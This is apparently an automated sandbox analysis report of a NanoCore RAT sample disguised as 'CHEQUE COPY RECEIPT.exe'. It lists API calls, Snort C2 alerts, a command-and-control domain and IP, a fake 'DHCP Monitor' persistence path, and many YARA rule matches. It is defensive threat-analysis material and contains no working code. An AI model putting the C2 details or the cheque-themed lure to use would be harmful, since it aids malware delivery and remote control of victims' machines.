Source:	Binary string: wntdll.pdb source: CHEQUE COPY RECEIPT.exe, 00000000.00000003.234086186.0000000002A80000.00000004.00000001.sdmp, CHEQUE COPY RECEIPT.exe, 00000009.00000003.252668286.0000000002C00000.00000004.00000001.sdmp

Spreading:

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405A15
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_004065C1 FindFirstFileA,FindClose,	0_2_004065C1
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 0_2_004027A1 FindFirstFileA,	0_2_004027A1
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 1_2_00404A29 FindFirstFileExW,	1_2_00404A29
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_00405A15 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	10_2_00405A15
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_004065C1 FindFirstFileA,FindClose,	10_2_004065C1
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Code function: 10_2_004027A1 FindFirstFileA,	10_2_004027A1
Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe	Code function: 12_2_00404A29 FindFirstFileExW,	12_2_00404A29

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49719 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49723 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49726 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49727 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49728 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49731 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49734 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49739 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49740 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49741 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49743 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49746 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49747 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49748 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49749 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49750 -> 185.150.24.55:7688
Source: Traffic	Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49751 -> 185.150.24.55:7688

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: chinomso.duckdns.org

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: chinomso.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.5:49719 -> 185.150.24.55:7688

Source: Joe Sandbox View

IP Address: 185.150.24.55 185.150.24.55

Source: Joe Sandbox View

ASN Name: SKYLINKNL SKYLINKNL

Source: unknown

DNS traffic detected: queries for: chinomso.duckdns.org

Source: CHEQUE COPY RECEIPT.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: CHEQUE COPY RECEIPT.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\Desktop\CHEQUE COPY RECEIPT.exe

Code function: 0_2_004054B2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004054B2

Source: CHEQUE COPY RECEIPT.exe, 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282659839.00000000022A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.504663155.0000000003563000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.501596655.00000000024D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 5364, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3888, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3060, type: MEMORY
Source: Yara match	File source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 1060, type: MEMORY
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.3570821.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5774629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.3327815.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.331e3b6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.CHEQUE COPY RECEIPT.exe.2a20000.5.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000001.238064388.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.282758425.00000000032DC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.508559464.0000000005770000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.282706630.00000000022F0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000001.258907957.0000000000414000.00000040.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.500407782.00000000022E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.281769166.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.270410700.0000000002A20000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.284708133.0000000004E32000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.501234563.0000000002442000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.497857999.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.282730831.00000000032A1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.499385166.0000000000798000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.284375156.00000000047C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.241553138.0000000002A30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.508321305.0000000005640000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.282508013.00000000006AD000.00000004.00000020.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 5364, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 5364, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3888, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3888, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3060, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 3060, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 1060, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: CHEQUE COPY RECEIPT.exe PID: 1060, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.2440000.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.CHEQUE COPY RECEIPT.exe.3570821.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.22ccc70.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a30000.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.7b3278.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.6b4140.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.CHEQUE COPY RECEIPT.exe.5774629.13.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.3327815.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.2.CHEQUE COPY RECEIPT.exe.5770000.12.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.230ba34.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 9.2.CHEQUE COPY RECEIPT.exe.2a31458.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CHEQUE COPY RECEIPT.exe.2a41458.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.1.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.47c0000.9.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.4e30000.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.CHEQUE COPY RECEIPT.exe.32a5530.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.2.CHEQUE COPY RECEIPT.exe.33231ec.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.356c1f8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.24fca54.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.2.CHEQUE COPY RECEIPT.exe.22e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 1.1.CHEQUE COPY RECEIPT.exe.415058.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
